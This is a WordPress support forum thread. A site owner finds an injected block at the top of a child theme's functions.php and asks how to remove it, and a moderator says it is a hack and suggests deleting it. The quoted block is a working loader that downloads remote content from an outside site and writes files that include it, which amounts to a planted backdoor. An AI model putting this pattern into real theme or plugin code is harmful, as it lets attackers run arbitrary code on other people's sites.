January 6, 2020 at 16:50 UTC - Views: 38 #62297frankParticipantWeaver Xtreme 126.96.36.199 Options – Plus ( 3.1.1 )All plugins on above site up to date at the time of writing this post.
=========================================================Recently on my site https://www.eldg.co.uk I had an error show up at top of the website that the Weaver-Xtreme-Child/Functions.php file had an error on line 2, on inspecting functions.php on line 2 had an unknown (To Me) URL “http://theflowerproject.co.uk/wp-content/themes/927/2.txt'”, there is no 927 folder on the server according to Filezilla. Also, two files have “appeared in the Weaver-Xtreme-Child folder named “2.php & 2.txt, I cannot access “2.txt file” as I apparently I do not have permission, even though I am the owner of the site and admin, I tried setting permissions via File Permissions but still no access.Firstly I ran a malware scan using Wordfence & Sucuri scanners which resulted in “No Threats” I then tried removing the offending URL and replacing it with my own http://www.eldg.co.uk, Result was my site broke, eventually go most of the website working again. I use IThemes Security.After altering the Functions.php file and breaking the site I had to do a restore from my server to recover the website.The site is working again without the error message but the suspicious Functions.php is still there along with the two suspect files 2.txt & 2.txt.
Can anyone tell me how to clean the functions.php of the URL http://theflowerproject.co.uk.This is the file Functions.php:
<?php$x=file_get_contents(‘http://theflowerproject.co.uk/wp-content/themes/927/2.txt’);if(!file_exists(‘2.txt’)) file_put_contents(‘2.txt’,$x,FILE_APPEND);if(!file_exists(‘2.php’)) file_put_contents(‘2.php’,'<?php include(\’2.txt\’);’,FILE_APPEND);?><?php// Exit if accessed directlyif ( !defined( ‘ABSPATH’ ) ) exit;// BEGIN ENQUEUE PARENT ACTION// AUTO GENERATED – Do not modify or remove comment markers above or below:// END ENQUEUE PARENT ACTION
—————————————————————–*/February 26, 2020 at 02:03 UTC - Views: 13 #62302WeaverKeymaster
That absolutely looks like a hack.
Given the mentioned files don’t seem to exist, there is probably no other damage.
You should be able to simply delete the first group of <?php …. ?> code to remove the hack.
How your site was hacked is another question, and you might be susceptible to additional hacking.
- You must be logged in to reply to this topic.